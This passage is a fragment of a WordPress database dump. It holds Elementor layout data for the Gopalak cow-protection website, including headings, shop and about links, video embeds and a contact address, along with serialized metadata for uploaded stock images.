here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10077,1685,'_elementor_page_assets','a:0:{}'),(10087,1687,'_wp_attached_file','2022/10/pexels-kelly-2881385-scaled.jpg'),(10088,1687,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1707;s:4:\"file\";s:39:\"2022/10/pexels-kelly-2881385-scaled.jpg\";s:8:\"filesize\";i:569626;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:32:\"pexels-kelly-2881385-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16309;}s:5:\"large\";a:5:{s:4:\"file\";s:33:\"pexels-kelly-2881385-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:118400;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:32:\"pexels-kelly-2881385-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9110;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:32:\"pexels-kelly-2881385-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:71825;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:34:\"pexels-kelly-2881385-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:237478;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:34:\"pexels-kelly-2881385-2048x1365.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:389444;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:32:\"pexels-kelly-2881385-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25337;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:30:\"pexels-kelly-2881385-50x33.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:33;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4099;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:32:\"pexels-kelly-2881385-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6222;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:30:\"pexels-kelly-2881385-48x32.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3936;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:30:\"pexels-kelly-2881385-48x32.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3936;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:24:\"pexels-kelly-2881385.jpg\";}'),(10089,1688,'_wp_attached_file','2022/10/pexels-karolina-grabowska-4219654-scaled.jpg'),(10090,1688,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1707;s:4:\"file\";s:52:\"2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\";s:8:\"filesize\";i:757471;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:45:\"pexels-karolina-grabowska-4219654-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22219;}s:5:\"large\";a:5:{s:4:\"file\";s:46:\"pexels-karolina-grabowska-4219654-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:164269;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:45:\"pexels-karolina-grabowska-4219654-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11249;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:45:\"pexels-karolina-grabowska-4219654-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:100160;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:47:\"pexels-karolina-grabowska-4219654-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:324686;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:47:\"pexels-karolina-grabowska-4219654-2048x1365.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:524531;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:45:\"pexels-karolina-grabowska-4219654-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32543;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:43:\"pexels-karolina-grabowska-4219654-50x33.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:33;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4408;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:45:\"pexels-karolina-grabowska-4219654-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7459;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:43:\"pexels-karolina-grabowska-4219654-48x32.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4182;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:43:\"pexels-karolina-grabowska-4219654-48x32.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4182;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:37:\"pexels-karolina-grabowska-4219654.jpg\";}'),(10091,1689,'_wp_attached_file','2022/10/pexels-kat-smith-735976-scaled.jpg'),(10092,1689,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1709;s:4:\"file\";s:42:\"2022/10/pexels-kat-smith-735976-scaled.jpg\";s:8:\"filesize\";i:280416;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:35:\"pexels-kat-smith-735976-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12662;}s:5:\"large\";a:5:{s:4:\"file\";s:36:\"pexels-kat-smith-735976-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60274;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:35:\"pexels-kat-smith-735976-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8355;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:35:\"pexels-kat-smith-735976-768x513.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:513;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39763;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:37:\"pexels-kat-smith-735976-1536x1025.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1025;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:113529;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:37:\"pexels-kat-smith-735976-2048x1367.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1367;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:184998;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:35:\"pexels-kat-smith-735976-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17333;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:33:\"pexels-kat-smith-735976-50x33.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:33;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4154;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:35:\"pexels-kat-smith-735976-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6283;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:33:\"pexels-kat-smith-735976-48x32.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4020;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:33:\"pexels-kat-smith-735976-48x32.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4020;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:27:\"pexels-kat-smith-735976.jpg\";}'),(10093,1690,'_wp_attached_file','2022/10/pexels-mark-stebnicki-2602864-scaled.jpg'),(10094,1690,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1771;s:4:\"file\";s:48:\"2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\";s:8:\"filesize\";i:705812;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:41:\"pexels-mark-stebnicki-2602864-300x208.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:208;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17665;}s:5:\"large\";a:5:{s:4:\"file\";s:42:\"pexels-mark-stebnicki-2602864-1024x708.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:708;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:148875;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:41:\"pexels-mark-stebnicki-2602864-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9117;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:41:\"pexels-mark-stebnicki-2602864-768x531.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:531;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88148;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:43:\"pexels-mark-stebnicki-2602864-1536x1063.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1063;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:300785;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:43:\"pexels-mark-stebnicki-2602864-2048x1417.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1417;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:492909;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:41:\"pexels-mark-stebnicki-2602864-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25988;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:39:\"pexels-mark-stebnicki-2602864-50x35.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:35;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4121;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:41:\"pexels-mark-stebnicki-2602864-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6263;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:39:\"pexels-mark-stebnicki-2602864-48x33.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:33;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4015;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:39:\"pexels-mark-stebnicki-2602864-48x33.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:33;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4015;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:33:\"pexels-mark-stebnicki-2602864.jpg\";}'),(10095,1691,'_wp_attached_file','2022/10/pexels-mark-stebnicki-2252557-scaled.jpg'),(10096,1691,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1707;s:4:\"file\";s:48:\"2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\";s:8:\"filesize\";i:1059038;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:41:\"pexels-mark-stebnicki-2252557-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21101;}s:5:\"large\";a:5:{s:4:\"file\";s:42:\"pexels-mark-stebnicki-2252557-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:186471;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:41:\"pexels-mark-stebnicki-2252557-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10083;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:41:\"pexels-mark-stebnicki-2252557-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:108352;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:43:\"pexels-mark-stebnicki-2252557-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:397359;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:43:\"pexels-mark-stebnicki-2252557-2048x1365.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:689528;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:41:\"pexels-mark-stebnicki-2252557-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30047;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:39:\"pexels-mark-stebnicki-2252557-50x33.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:33;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4240;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:41:\"pexels-mark-stebnicki-2252557-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6787;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:39:\"pexels-mark-stebnicki-2252557-48x32.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4094;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:39:\"pexels-mark-stebnicki-2252557-48x32.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4094;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:33:\"pexels-mark-stebnicki-2252557.jpg\";}'),(10097,1692,'_wp_attached_file','2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg'),(10098,1692,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1707;s:4:\"file\";s:53:\"2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\";s:8:\"filesize\";i:900445;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:46:\"pexels-ave-calvar-martinez-3637852-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19124;}s:5:\"large\";a:5:{s:4:\"file\";s:47:\"pexels-ave-calvar-martinez-3637852-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:148920;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:46:\"pexels-ave-calvar-martinez-3637852-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9932;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:46:\"pexels-ave-calvar-martinez-3637852-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\"